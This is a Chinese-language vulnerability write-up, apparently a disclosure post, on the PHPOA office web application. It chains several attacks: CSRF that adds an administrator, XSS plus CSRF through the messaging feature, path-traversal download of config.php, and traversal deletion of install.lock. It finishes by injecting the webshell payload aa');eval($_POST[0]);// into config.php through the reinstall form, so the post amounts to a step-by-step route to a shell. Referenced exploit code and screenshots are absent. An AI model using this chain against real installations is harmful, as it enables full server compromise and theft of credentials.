注:部分重复
首先我们在网站http://www.phpoa.cn/下载一份 本地安装。
程序安装地址
1.先来一发csrf。


抓包如下 未发现任何防护措施 。

附上利用代码 (添加的还是管理员哦。)
2.来一发xss+csrf
发送短消息这。 需要好好过滤一下!


下面我们来抓一下发送消息的数据包。

同样没有防护措施。
我们继续构造一下 csrf
来张效果图


好了,这样的话 ,只要随便有一个人中招就可以拿下他的管理员后台了。
3.再来一发任意文件下载
漏洞 详情 请看源代码
程序用 /进行分割 却只检测 $phps[0] 是不是为data 和ntko
然后不用 .进行分割 只检测$php1[1]
直接用 data/../config.php 就可以下载配置文件了。。
不过就想这样 拿到shell 还是不行的
4.任意文件删除
先随便备份一张表 然后再进行删除
系统设置-》

来抓包

我们来 构造下 把install.lock删除掉 。
C:\wamp\www\data\db\test.sql
C:\wamp\www\cache\install.lock
好的 ..\..\cache\install.lock

Post一下修改好的数据
然后你就会发现 install.lock被删除掉了
好了 install.lock删除掉了 我们来准备我们的shell吧。
5.修改config.php
删除掉install.lock之后 打开网址
下一步两次 然后到了第三步

还记得 上面下载的config文件吗。
我们把 数据库用户名 和密码 都输入正确的
然后 在数据库名称中输入
aa');eval($_POST[0]);//
然后下一步。

config.php 中的'前加上了一个\ 不过不要紧 我们返回上一部
我们只需要在数据库名称中输入aa
然后下一步 即可

我们去看下config.php


好吧这是为什么呢。
下面附上关键代码
好吧 大礼包 到此结束!